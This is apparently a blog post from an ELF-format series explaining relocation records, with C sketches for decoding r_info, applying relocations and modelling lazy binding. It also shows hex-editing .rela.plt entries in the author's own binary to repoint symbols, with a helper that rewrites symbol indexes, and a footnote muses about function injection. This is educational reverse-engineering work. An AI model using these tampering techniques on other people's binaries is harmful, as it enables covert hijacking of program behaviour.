<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCSNng5ZNhe5VUCxJjbRiOc3ZRX8ViRP4NUom3jjuOY6YfMwDE8l-SL6sQ69j7wL6mVs6ulC1En2NrL2sj7nGOGpKsJvPyBbS8TvottaR2LCA-p7FLyTCTbtUyyqGAWJmOmrGpARhst8/s1600/Rela_type_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="1169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCSNng5ZNhe5VUCxJjbRiOc3ZRX8ViRP4NUom3jjuOY6YfMwDE8l-SL6sQ69j7wL6mVs6ulC1En2NrL2sj7nGOGpKsJvPyBbS8TvottaR2LCA-p7FLyTCTbtUyyqGAWJmOmrGpARhst8/s1600/Rela_type_calc.png" /></a></div>
<br />
Nothing too fancy: the <span style="font-family: "courier new" , "courier" , monospace;">r_info</span> field (<i>as with many C-esque ELF metadata <span style="font-family: "courier new" , "courier" , monospace;">*_info</span> fields</i>) is just a bit field that gets pulled through some shifting / AND-ing operations to isolate the bits that encode particular properties.<br />
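<div>
The shifting and AND-ing is easy to verify by hand. For 64-bit objects glibc's <span style="font-family: "courier new" , "courier" , monospace;">elf.h</span> defines <span style="font-family: "courier new" , "courier" , monospace;">ELF64_R_SYM(i)</span> as <span style="font-family: "courier new" , "courier" , monospace;">(i) >> 32</span>, <span style="font-family: "courier new" , "courier" , monospace;">ELF64_R_TYPE(i)</span> as <span style="font-family: "courier new" , "courier" , monospace;">(i) & 0xffffffff</span> and <span style="font-family: "courier new" , "courier" , monospace;">ELF64_R_INFO(sym, type)</span> as <span style="font-family: "courier new" , "courier" , monospace;">((Elf64_Xword)(sym) << 32) + (type)</span>. The helper names below are hypothetical; they just spell out the same operations and check them against the real macros.</div>

```c
#include <assert.h>
#include <elf.h>      /* ELF64_R_SYM, ELF64_R_TYPE, ELF64_R_INFO, R_X86_64_* */
#include <stdint.h>

/* Same operations as the <elf.h> macros, spelled out:
 *   symbol index = high 32 bits, relocation type = low 32 bits. */
static uint32_t rinfo_sym(uint64_t info)  { return (uint32_t)(info >> 32); }
static uint32_t rinfo_type(uint64_t info) { return (uint32_t)(info & 0xffffffffu); }

static uint64_t rinfo_pack(uint32_t sym, uint32_t type) {
    return ((uint64_t)sym << 32) | type;
}

/* Sanity check of the helpers against the real macros for one value. */
static void check_rinfo(uint64_t info) {
    assert(rinfo_sym(info)  == ELF64_R_SYM(info));
    assert(rinfo_type(info) == ELF64_R_TYPE(info));
    assert(rinfo_pack(rinfo_sym(info), rinfo_type(info)) == info);
}
```

<div>
So a readelf Info value of <span style="font-family: "courier new" , "courier" , monospace;">000200000007</span> decodes to symbol index 2 and type 7, which is <span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_JUMP_SLOT</span> in <span style="font-family: "courier new" , "courier" , monospace;">elf.h</span>.</div>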
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">ELF64_R_SYM</span> macro is for pulling out the symbol that this relocation applies to (<i>I hinted at that in the cheat sheet at the beginning of the section - because I got them foreshadowing skills yo</i>). Here's an example from a random binary I pulled off my machine (<i>notice the Info field in the readelf dump and how it correlates with the symbol indexes</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSOBEYbqSX5stwC5cScpsGtiYAizpEVrnVV5seyQXSEphZHXUym55-dZek2Uyeaz6Vzyrrk2AvM2dCXKgYfM1PcCQ5yzqHdHr4APNFiRERAXWCiFIUErVczHe_QH2vTNGsWpwd0XDvAjc/s1600/dynamic-relocsVSSymbolTable+%25283%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="776" data-original-width="1013" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSOBEYbqSX5stwC5cScpsGtiYAizpEVrnVV5seyQXSEphZHXUym55-dZek2Uyeaz6Vzyrrk2AvM2dCXKgYfM1PcCQ5yzqHdHr4APNFiRERAXWCiFIUErVczHe_QH2vTNGsWpwd0XDvAjc/s1600/dynamic-relocsVSSymbolTable+%25283%2529.png" /></a></div>
<br />
<br />
Some more insight into how this is probably meant to be used internally by the C runtime can be seen in this extract from <span style="font-family: "courier new" , "courier" , monospace;">glibc-2.28_afl/glibc-2.28/elf/do-rel.h</span>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKUZRnuSnkHnqujhY1OXZDZaAKIKqbBjbvByxDOJtyo9Ssdm9rYh-KqAkxmeBituAiwV24Ueo9XTqg4hpjIZUvbRR66Tvwdj4sQkFJp415gvkABUFmW5Z15TJYOWWqw3FN2EY6s2gMeD8/s1600/glibc-ruseage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="763" data-original-width="1236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKUZRnuSnkHnqujhY1OXZDZaAKIKqbBjbvByxDOJtyo9Ssdm9rYh-KqAkxmeBituAiwV24Ueo9XTqg4hpjIZUvbRR66Tvwdj4sQkFJp415gvkABUFmW5Z15TJYOWWqw3FN2EY6s2gMeD8/s1600/glibc-ruseage.png" /></a></div>
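<br />
To get a feel for what a loop like that does, here's a toy relocation pass in C. This is not glibc's code. It's a simplified sketch that makes three assumptions:<br />
<ul>
<li>the "image" being relocated is just a byte buffer;</li>
<li>r_offset is an offset into that buffer;</li>
<li>sym_values[] (a hypothetical stand-in for real symbol lookup) already holds resolved addresses.</li>
</ul>
The per-type formulas follow the x86-64 psABI: JUMP_SLOT and GLOB_DAT store S, R_X86_64_64 stores S + A, and RELATIVE stores B + A:<br />

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef uint64_t Elf64_Addr;
typedef uint64_t Elf64_Xword;
typedef int64_t  Elf64_Sxword;

/* Same layout as glibc's Elf64_Rela. */
typedef struct {
    Elf64_Addr   r_offset;
    Elf64_Xword  r_info;
    Elf64_Sxword r_addend;
} Elf64_Rela;

#define ELF64_R_SYM(i)  ((i) >> 32)
#define ELF64_R_TYPE(i) ((i) & 0xffffffff)

#define R_X86_64_64        1
#define R_X86_64_GLOB_DAT  6
#define R_X86_64_JUMP_SLOT 7
#define R_X86_64_RELATIVE  8

/* Toy relocation pass (hypothetical, not the runtime's code).
 * image_base is where the buffer is pretended to be loaded (B),
 * sym_values[] holds already-resolved symbol addresses (S).
 * Returns -1 on a relocation type this toy doesn't handle. */
static int apply_relas(uint8_t *image, uint64_t image_base,
                       const Elf64_Rela *relas, size_t count,
                       const uint64_t *sym_values)
{
    for (size_t i = 0; i < count; i++) {
        const Elf64_Rela *r = &relas[i];
        uint64_t S = sym_values[ELF64_R_SYM(r->r_info)];
        uint64_t A = (uint64_t) r->r_addend;
        uint64_t value;

        switch (ELF64_R_TYPE(r->r_info)) {
        case R_X86_64_JUMP_SLOT:
        case R_X86_64_GLOB_DAT: value = S;              break;
        case R_X86_64_64:       value = S + A;          break;
        case R_X86_64_RELATIVE: value = image_base + A; break;
        default:                return -1;
        }
        /* In this toy, r_offset indexes straight into the buffer. */
        memcpy(image + r->r_offset, &value, sizeof value);
    }
    return 0;
}
```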
<br />
<br />
<br />
We know what a C program will most likely use in terms of its own terminology, but what does the format actually look like in raw hex?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVw6uLpgwixze4OhlofrKV2JYmav8ZxZ14i4jac79vxIIPjM7AjGeynx6AqCEfhPeEevJwxGvoZmGGeRH8Unb8BNMT4jcRxQ5UFxqgQRZ9DVxNWGXQP_az-tPw1UIYYjGATCaRTccHr5E/s1600/raw_reloc_section.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="414" data-original-width="948" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVw6uLpgwixze4OhlofrKV2JYmav8ZxZ14i4jac79vxIIPjM7AjGeynx6AqCEfhPeEevJwxGvoZmGGeRH8Unb8BNMT4jcRxQ5UFxqgQRZ9DVxNWGXQP_az-tPw1UIYYjGATCaRTccHr5E/s1600/raw_reloc_section.png" /></a></div>
<br />
<br />
One can see the extra 8 NULL bytes at the end of each entry. This is the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> set to 0 (<i>now you know why readelf mentions the addend value even though it's almost always 0</i>).<br />
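<br />
Here's a small C sketch that builds those 24 bytes by hand, assuming a little-endian target like x86_64. encode_rela and put_le64 are hypothetical helpers, and the values in the note below are invented for illustration:<br />

```c
#include <stddef.h>
#include <stdint.h>

/* Write v as 8 little-endian bytes (x86_64 ELF files are little-endian). */
static void put_le64(uint8_t *out, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        out[i] = (uint8_t) (v >> (8 * i));
}

/* Hypothetical helper: serialize one Elf64_Rela record the way it sits
 * in .rela.plt: r_offset, r_info, r_addend, 8 bytes each (24 in total). */
static void encode_rela(uint8_t out[24], uint64_t r_offset,
                        uint64_t r_info, int64_t r_addend)
{
    put_le64(out,      r_offset);
    put_le64(out + 8,  r_info);
    put_le64(out + 16, (uint64_t) r_addend);
}
```

For example, an r_offset of 0x601018 with an r_info of (2 << 32) | 7 and an addend of 0 encodes as the following three 8-byte groups:<br />
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">18 10 60 00 00 00 00 00</span> (r_offset)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">07 00 00 00 02 00 00 00</span> (r_info)</li>
<li>eight <span style="font-family: "courier new" , "courier" , monospace;">00</span> bytes (r_addend)</li>
</ul>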
<br />
I mentioned that the <span style="font-family: "courier new" , "courier" , monospace;">[name] </span>part of a relocation section's name, <span style="font-family: "courier new" , "courier" , monospace;">.rel(a).[name]</span>, indicates what the relocations are for, so I thought I could cook up an example of this in use. Here is a large sample of <span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_JUMP_SLOT</span> entries that I grabbed from a random binary on my machine (<i>literally used a bash script that takes a list and passes it through shuf lol</i>):<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhomWViuTcqZNuKtvhkB-_dxZL47E64haWjbLGkUlVjYjJaJxGNsh9roJWqJo_Ap_iR5-8CbXhhSMw0uOBAAzSNbbFSCpu-lNpAnucLYB655Vq5D1cYWjuK3v4m_ECBWwB_VoQbViUaaus/s1600/rela.plt+big+example+%25282%2529.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="607" data-original-width="994" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhomWViuTcqZNuKtvhkB-_dxZL47E64haWjbLGkUlVjYjJaJxGNsh9roJWqJo_Ap_iR5-8CbXhhSMw0uOBAAzSNbbFSCpu-lNpAnucLYB655Vq5D1cYWjuK3v4m_ECBWwB_VoQbViUaaus/s1600/rela.plt+big+example+%25282%2529.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i style="font-size: medium; text-align: left;">Color choice was on point with this one. </i></td></tr>
</tbody></table>
<br />
Clearly this section provides some insight into how the PLT's jump instructions, which go through the GOT, work. As far as I can tell, <span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_JUMP_SLOT</span> entries exist specifically to fill in the GOT slots that the PLT jump gadgets go through.<br />
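<br />
Here's a toy C model of the lazy binding that those JUMP_SLOT entries feed into. There are heavy assumptions here:<br />
<ul>
<li>the "GOT slot" is a plain function pointer;</li>
<li>the "PLT stub" is a C function;</li>
<li>the resolver is a hypothetical lazy_stub rather than the dynamic linker.</li>
</ul>
So this only shows the control flow. The first call goes through the resolver, which patches the slot, and later calls jump straight to the target:<br />

```c
/* Toy model of lazy binding (all names hypothetical). */
typedef int (*slot_fn)(int);

static int resolver_calls = 0;

/* Stands in for libc's putchar. */
static int real_putchar(int c) { return c; }

static int lazy_stub(int c);

/* The "GOT slot": initially it points back at the lazy resolver path. */
static slot_fn got_slot = lazy_stub;

/* What the JUMP_SLOT relocation drives: resolve the symbol, patch the
 * slot that r_offset names, then forward the original call. */
static int lazy_stub(int c)
{
    resolver_calls++;
    got_slot = real_putchar;
    return got_slot(c);
}

/* A call site: every call jumps through the GOT slot. */
static int call_putchar(int c) { return got_slot(c); }
```

Calling call_putchar twice returns each character and leaves resolver_calls at 1.<br />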
<br />
Anyway, all these beautiful fairy tales about Elfs make great bedtime stories for unquestioning children, but let's see if the format is really treated this way. The next section looks at some of the horrible things that can happen when someone messes with the reloc metadata.<br />
<h2>
Relocation hex sorcery</h2>
</div>
<div>
Let's see which evil spirits we can summon by flipping some bits in an Elf's relocation records.<br />
<br />
<h3 style="text-align: left;">
r_info mangling</h3>
<br />
First off, let's see what happens when we change the <span style="font-family: "courier new" , "courier" , monospace;">r_info </span>field. Here I have two symbols that have reloc records in <span style="font-family: "courier new" , "courier" , monospace;">.rela.plt</span>. I'm mangling the <span style="font-family: "courier new" , "courier" , monospace;">r_info </span>field so they both point to the same function, namely <span style="font-family: "courier new" , "courier" , monospace;">puts</span>, and then seeing what happens (<i>I'm changing the byte in the <span style="font-family: "courier new" , "courier" , monospace;">r_info </span>field that holds the index of the symbol the reloc record points to</i>):<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqk_VzlhTUAShZQlHH1k3WVuXHJYAa23hnIzQyP-uiZ-bo58p8Cn9fP8CkN6JIeawbmOeHMew2wXgP37j7A8G8e7HigYljH8ZkMsIo1wkUCHD5rpDEs6_R8HDhluHSbTxX_YQ-xEv96t4/s1600/r_info_mangling_better+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1036" data-original-width="1600" height="414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqk_VzlhTUAShZQlHH1k3WVuXHJYAa23hnIzQyP-uiZ-bo58p8Cn9fP8CkN6JIeawbmOeHMew2wXgP37j7A8G8e7HigYljH8ZkMsIo1wkUCHD5rpDEs6_R8HDhluHSbTxX_YQ-xEv96t4/s640/r_info_mangling_better+%25281%2529.png" width="640" /></a></div>
<br />
<br />
<br />
In the screenshot I'm trying to show what the picture was before and after editing the relocation metadata. We can see here that gdb actually feels the effect of the change, because it used the edited reloc when handling the symbol for <span style="font-family: "courier new" , "courier" , monospace;">putchar</span>.<br />
<br />
What happened here is that when gdb tried to resolve the function, it made use of the index value we changed. We made the reloc point to a different index in the symbol table. gdb used that index to resolve the definition, so the puts function was targeted instead.<br />
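<br />
If you'd rather script the hex edit than do it by hand, here's a minimal C sketch. It assumes the raw <span style="font-family: "courier new" , "courier" , monospace;">.rela.plt</span> bytes are already in memory; finding the section and writing the file back out are left out. repoint_rela_sym is a hypothetical helper. It rewrites the high 32 bits of r_info (the symbol index) and leaves the type bits alone:<br />

```c
#include <stddef.h>
#include <stdint.h>

/* Each Elf64_Rela is 24 bytes: r_offset (bytes 0..7), r_info (8..15),
 * r_addend (16..23), stored little-endian on x86_64. */
#define RELA_SIZE 24

static uint64_t get_le64(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | p[i];      /* p[7] is the most significant byte */
    return v;
}

static void put_le64(uint8_t *p, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        p[i] = (uint8_t) (v >> (8 * i));
}

/* Hypothetical helper: re-point relocation n in a raw .rela.plt dump at
 * symbol new_sym, keeping its relocation type (low 32 bits) intact. */
static void repoint_rela_sym(uint8_t *rela_plt, size_t n, uint32_t new_sym)
{
    uint8_t *info = rela_plt + n * RELA_SIZE + 8;
    uint64_t r_info = get_le64(info);
    r_info = ((uint64_t) new_sym << 32) | (r_info & 0xffffffffULL);
    put_le64(info, r_info);
}
```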
<br />
So we've learned that the <span style="font-family: "courier new" , "courier" , monospace;">r_info </span>field is pretty powerful when it comes to driving function identification in some contexts(2). Beyond that we can also look at how malformed <span style="font-family: "courier new" , "courier" , monospace;">r_offset</span> values affect execution.<br />
<br />
<h3>
r_offset mangling</h3>
Another thing I can show here is how repointing the <span style="font-family: "courier new" , "courier" , monospace;">r_offset</span> values at the same location affects resolving GOT and PLT stuff. Because we are re-pointing a symbol's relocation record, it affects how the runtime recognizes that a symbol has already been resolved. As a result, the runtime resolver can end up being invoked every time we use that dynamic symbol in code. This is me editing the <span style="font-family: "courier new" , "courier" , monospace;">r_offset</span> values for puts and putchar to point to the same value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOuUO-4q0pOT1u1ccNnUmT3cknm-1raqNIxfP2Bm2Q17PZ1RGIbAi5NcLW4ASvWcfE-2kHMgayQru25FF1q5ZHijWP7GHn0vbME5EWC3UbRqf-0YEr6fl-zoinfOLycTKPZm9AY2EBjI4/s1600/injecting+r_offset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="709" data-original-width="1008" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOuUO-4q0pOT1u1ccNnUmT3cknm-1raqNIxfP2Bm2Q17PZ1RGIbAi5NcLW4ASvWcfE-2kHMgayQru25FF1q5ZHijWP7GHn0vbME5EWC3UbRqf-0YEr6fl-zoinfOLycTKPZm9AY2EBjI4/s640/injecting+r_offset.png" width="640" /></a></div>
<br />
<br />
And this is the result in gdb:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEZmkIwT07VnwBVqs4TeW25W0Cu58B8IooE-ihGcNrXRV7Gpx2N54Rar_nm3pw0hlBqlozj70Ekz6Z4EmQn6kQ4SJDrHhIzqhDICsMLjwWkG_SuvYHk1w8tsdBcq3lKtIVE0Ac52Id3FQ/s1600/r_info-change-in-gdb+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="449" data-original-width="955" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEZmkIwT07VnwBVqs4TeW25W0Cu58B8IooE-ihGcNrXRV7Gpx2N54Rar_nm3pw0hlBqlozj70Ekz6Z4EmQn6kQ4SJDrHhIzqhDICsMLjwWkG_SuvYHk1w8tsdBcq3lKtIVE0Ac52Id3FQ/s1600/r_info-change-in-gdb+%25281%2529.png" /></a></div>
<span id="goog_564296731"></span><span id="goog_564296732"></span><br />
<br />
On the right we have the binary that was edited; on the left we have the original. In this gdb session I set a breakpoint on the call in the PLT at <span style="font-family: "courier new" , "courier" , monospace;">0x400420</span>. This call invokes <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span>, which handles looking up symbols and patching the GOT. Comparing the two sessions, messing with the <span style="font-family: "courier new" , "courier" , monospace;">r_offset</span> causes the <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span> call to happen one more time than in the original.<br />
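<br />
Here's a toy C model of why a mis-pointed r_offset can send you back into the resolver. It's a deliberately simplified sketch: the names are hypothetical, GOT slots are plain flags, and there is no real dynamic linker. It doesn't try to reproduce the exact call count from the gdb session. It only shows that if putchar's relocation names some other slot, the resolver patches that slot and putchar's own slot stays unresolved:<br />

```c
#include <stddef.h>

/* Toy model (hypothetical names): PLT entry 0 = puts, 1 = putchar.
 * reloc_slot[] plays the role of r_offset: it tells the resolver
 * which GOT slot to patch for each relocation record. */
enum { SLOT_UNRESOLVED = 0, SLOT_RESOLVED = 1 };

struct toy_plt {
    int    got[2];         /* state of each GOT slot */
    size_t reloc_slot[2];  /* "r_offset" of each relocation record */
    int    resolver_calls;
};

/* Call PLT entry idx: if its own GOT slot is unresolved, enter the
 * resolver, which patches whichever slot the relocation names. */
static void call_plt(struct toy_plt *p, size_t idx)
{
    if (p->got[idx] == SLOT_UNRESOLVED) {
        p->resolver_calls++;
        p->got[p->reloc_slot[idx]] = SLOT_RESOLVED;
    }
}

/* Call putchar's entry n times and report how often the resolver ran. */
static int resolver_runs(size_t r_offset_of_putchar, int n)
{
    struct toy_plt p = { {SLOT_UNRESOLVED, SLOT_UNRESOLVED},
                         {0, r_offset_of_putchar}, 0 };
    for (int i = 0; i < n; i++)
        call_plt(&p, 1);
    return p.resolver_calls;
}
```

With the correct r_offset (slot 1), three calls to putchar hit the resolver once. With r_offset pointed at puts' slot (slot 0), all three calls do.<br />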
<br />
<h3>
r_type mangling</h3>
As for the r_type value (<i>which lives in the low 32 bits of <span style="font-family: "courier new" , "courier" , monospace;">r_info</span></i>), I tried injecting a bunch of other types, but learned that the runtime has consistency checks on them. There may be many other kinds of reloc sections that allow for arbitrary <span style="font-family: "courier new" , "courier" , monospace;">r_types</span> and all kinds of symbol remapping. If they exist, I'll dedicate a blog post to them when I find them.<br />
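<br />
For a flavour of what a consistency check like that can look like, here's a toy C version. This is my own hypothetical sketch, not the runtime's code. As far as I know, glibc's real lazy-relocation path also accepts a few other types, such as R_X86_64_IRELATIVE. This sketch simply refuses anything in <span style="font-family: "courier new" , "courier" , monospace;">.rela.plt</span> whose type isn't R_X86_64_JUMP_SLOT:<br />

```c
#include <stdint.h>

#define ELF64_R_TYPE(i)    ((i) & 0xffffffff)
#define R_X86_64_JUMP_SLOT 7

/* Hypothetical sanity check: lazily bound PLT relocations are expected
 * to be JUMP_SLOT, so any other type is treated as a bad relocation. */
static int plt_reloc_type_ok(uint64_t r_info)
{
    return ELF64_R_TYPE(r_info) == R_X86_64_JUMP_SLOT;
}
```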
<br />
For now, let's look at how miserably I failed:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrq9A4ecSCEkMEXatkIq5yj7tjcaXOt0bepGV8EeaZzMJICID2t1Ym2lBZWF5yWe7LMNzLJDIVzx9fliqcepbiF2SQTLnNptVyHAzlkv_sXFkES_t6NYd8VLhQjA0BHNjZND4DEjP-pyQ/s1600/Screenshot+from+2018-10-18+20-24-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="726" data-original-width="1226" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrq9A4ecSCEkMEXatkIq5yj7tjcaXOt0bepGV8EeaZzMJICID2t1Ym2lBZWF5yWe7LMNzLJDIVzx9fliqcepbiF2SQTLnNptVyHAzlkv_sXFkES_t6NYd8VLhQjA0BHNjZND4DEjP-pyQ/s640/Screenshot+from+2018-10-18+20-24-57.png" width="640" /></a></div>
<br />
As you can see, whatever I try is rejected outright by the runtime; it won't have any of this nonsense lol. Anyway, that's it for this one folks, stay tuned for the next post in this series covering some of the internals of dynamic linking and lazy loading ;).</div>
<div>
<h2 style="text-align: left;">
References and Reading</h2>
<br />
<ol style="text-align: left;">
<li><a href="http://em386.blogspot.com/2006/10/resolving-elf-relocation-name-symbols.html">http://em386.blogspot.com/2006/10/resolving-elf-relocation-name-symbols.html</a></li>
<li><a href="http://bottomupcs.sourceforge.net/csbu/x3882.htm">http://bottomupcs.sourceforge.net/csbu/x3882.htm</a></li>
<li><a href="https://www.youtube.com/watch?v=kUk5pw4w0h4">https://www.youtube.com/watch?v=kUk5pw4w0h4</a></li>
<li><a href="https://infosecwriters.com/text_resources/pdf/GOT_Hijack.pdf">https://infosecwriters.com/text_resources/pdf/GOT_Hijack.pdf</a></li>
<li><i>SecGOT: Secure Global Offset Tables in ELF Executables </i><a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1008.4167&rep=rep1&type=pdf">http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1008.4167&rep=rep1&type=pdf</a> </li>
<li><a href="https://stackoverflow.com/questions/41905762/why-does-the-linker-generate-seemingly-useless-relocations-in-rela-plt">https://stackoverflow.com/questions/41905762/why-does-the-linker-generate-seemingly-useless-relocations-in-rela-plt</a></li>
<li><a href="http://www.ucw.cz/~hubicka/papers/abi/node22.html">http://www.ucw.cz/~hubicka/papers/abi/node22.html</a> </li>
<li><a href="http://s.eresi-project.org/inc/articles/elf-rtld.txt">http://s.eresi-project.org/inc/articles/elf-rtld.txt</a></li>
</ol>
<div>
<br /></div>
</div>
<div>
<br /></div>
<div>
<div>
<h3 style="text-align: left;">
Footnotes:</h3>
<div>
<ol style="text-align: left;">
<li style="font-family: "times new roman";">To expand Lacan's quote here (<i>purely for the Elf Format Philosophiles</i>): Reality is never what we symbolize it to be, it is what always escapes our symbolization. What is left from our inevitable failure to completely symbolize it perfectly absolutely well without mistakes exactly right clearly - you get it (<i>why are there so many perfected works for perfection itself</i>)? In this post I will essentially show in some ways that symbols can profoundly betray the functions/variables they are meant to point to: this is because even the symbols themselves must have symbols that point to their own meanings! So there seems to be a contingency on symbols having meaning but nothing that cements their right to point to anything as a specific meaning. They are free to point to any meaning or function (<i>he says as he repoints Lacan's philosophy at the Elf world</i>). But in the practical world in which we use them, of course, they can, as an aggregated collection of symbols, in some way expose a singular function; we can "recognize" that symbols in a certain category can be "summed up" or "replaced for" (<i>in a context-free grammatical sense</i>) more or less by a collective theme. Such themes are symbols too! But if under an already assumed theme, a collection of symbols misses consistency or paradoxes in a certain way with this theme (<i>which it will always inevitably do - because the hosting theme to every theme is reality itself - which always paradoxes</i>) the whole picture is broken; the theme becomes absurdity instead of what it originally hoped to be. In Lacan's case he argued that this is what in some sense defines our access to "the real" reality and that addressing this too directly caused a reflexive denial of how reality works (<i>we cannot accept the realism of complete non-fantasy or the extreme fantasy either</i>). 
In the case of Linux executable formats it means we need to get some person to reverse engineer the whole binary to determine what functions do from the ground up - which is maddening in and of itself! lol </li>
<li style="font-family: "times new roman";"><span style="font-family: "times new roman";">This means there must be other things we can do with it, perhaps inject functions into the binary or re-point functions at a key time in their lazy loading life-cycle or force a re-invocation of the run-time in a way that side channels information about the functions being called and therefore data being processed? maybe maybe lol Probably better addressed in a separate post.</span></li>
</ol>
</div>
</div>
<div>
</div>
</div>
<div>
<br /></div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-64127613923040499602018-10-10T20:09:00.000-07:002018-10-10T20:16:56.472-07:00Introduction to the ELF Format (Part VI) : The Symbol Table and Relocations (Part 1) <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
This post is part of a series on the ELF format. If you haven't checked out the other parts of the series, here they are:<br />
<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
<li>(Part IV) : Section Types and Special Sections <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html</a></li>
<li>(Part V) : C Start up <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html</a> </li>
<li>this</li>
</ol>
<br />
In this and the next post I'm going to explore how Elf files manage to pull off the magic of symbol resolution as well as the format, offsets and records in the Elf that represent this information. There are many facets to this mechanism in the format, and before I get into each of them I'd like to provide a gentle intro to frame your thinking around why things work the way they do.<br />
<br />
<h2 style="text-align: left;">
Introduction</h2>
<h3 style="text-align: left;">
<i>Symbolically locating the purpose of relocation</i></h3>
<i><br /></i>
<i>If you are already pretty clued up on why this is important, feel free to move on to the next section.</i><br />
<br />
I know you probably want to jump right in and look at all the awesome C definitions and byte offsets. But I found that it's much easier to understand how all these obscure offsets and hex values work if you know a little bit of the intention behind them and appreciate the real complexity of the problem being solved. So let's talk about why C programs need relocation and symbol tables.<br />
<br />
We know that code can become pretty big, and to make things more refactor-able and reusable we split it up into smaller parts(1). A natural need develops: to be able to break code up into smaller sub-classes/files or general organizational units. In C/C++ these units end up as object files and shared libraries. The Elf file format supports stitching them together through Relocation, Symbols and Dynamic Linking. That is to say, the "things" being relocated are symbols, and symbols are for the most part variables and functions of different flavors.<br />
<br />
Suffice it to say, "relocations" will be found in the Relocation Tables and the symbols they refer to will be found in the ELF's Symbol Tables (<i>I should also mention there is more than one symbol table and more than one relocation table, if for nothing else than efficiency and extended capability in configuring symbol resolution</i>).<br />
<br />
<h3 style="text-align: left;">
<i>The object of compiling and linking objects</i></h3>
<div>
It also helps to picture what the compiler does to prepare this information. Knowing what the final goal is helps us suffer through the annoyingly complex and obscure steps that lead to it.<br />
<br />
When throwing together different shared libraries and object files, the linker decouples the actions of resolving symbols from linking the files together. So essentially there will be a first "sweep"(2) that slaps the different shared libraries and object files into a contiguous sequence.<br />
That action means that in the final Elf object file, we are simply adding an offset to the original addresses of symbols, displacing them from where they originally appear in their own files.<br />
<br />
An even simpler way of thinking about it would be to say it's basically like grabbing a bunch of arrays and sticking them inside another array to build an array of arrays (<i>which is a common action in many languages</i>). I've depicted a minimal compile and link process with the gcc commands included, and even stuck in the real offsets some of the functions got mapped to:<br />
<br />
<br />
